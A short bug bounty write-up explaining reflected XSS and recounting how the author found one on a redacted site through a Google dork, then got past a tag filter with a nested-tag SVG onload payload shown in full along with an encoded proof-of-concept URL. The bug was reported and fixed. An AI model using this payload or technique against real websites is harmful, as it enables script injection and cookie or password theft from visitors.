How I bypassed Reflected XSS in well-known platform
What is a XSS attack
Cross-site scripting (XSS) is a web application vulnerability that permits an attacker to inject code, (typically HTML or JavaScript), into the contents of an outside website. When a victim views an infected page on the website, the injected code executes in the victim’s browser. Consequently, the attacker has bypassed the browser’s same origin policy and is able to steal private information from a victim associated with the website
What is a reflected XSS attack
Reflected XSS attacks, also known as non-persistent attacks, occur when a malicious script is reflected off of a web application to the victim’s browser.
The script is activated through a link, which sends a request to a website with a vulnerability that enables execution of malicious scripts. The vulnerability is typically a result of incoming requests not being sufficiently sanitized, which allows for the manipulation of a web application’s functions and the activation of malicious scripts.
To distribute the malicious link, a perpetrator typically embeds it into an email or third party website (e.g., in a comment section or in social media). The link is embedded inside an anchor text that provokes the user to click on it, which initiates the XSS request to an exploited website, reflecting the attack back to the user.
Enumeration
I did’nt invest a lot in enumeration and discovering due to a bug exist in the main domain www.redacted.com
by doing google dork i found a path with param: redirect?t=
site:www.redacted.com inurl:redirect
I tested it for open redirection but it didn’t work and suddenly I cheked the source code and i observed that my code was there inside a <script> </script> tag
Exploitation of r-XSS vulnerability
Reflected XSS bugs can be exploited to steal cookies, capture passwords and perform CSRF …
I injected my first code : </script> alert(‘1’) <script></script> trying to close the script and open a malicious script but there was a filter in place that broke all my script and tags <script>, <img> …
It took me about 2 days to figure out the right payload to bypass the filter :
</</script>script> <</svg>svg/onload=alert`xss`>//
and the final URL / POC was like:
https://www.redacted.com/iammore/redirect?t=%3C/%3C/script%3Escript%3E%20%3C%3C/svg%3Esvg/onload=alertxss%3E//
AND BOOM!! Reflected XSS!!
I send this repport to the team, And in about 1 week, this vulnerability was fixed and rewarded me.
Never Give up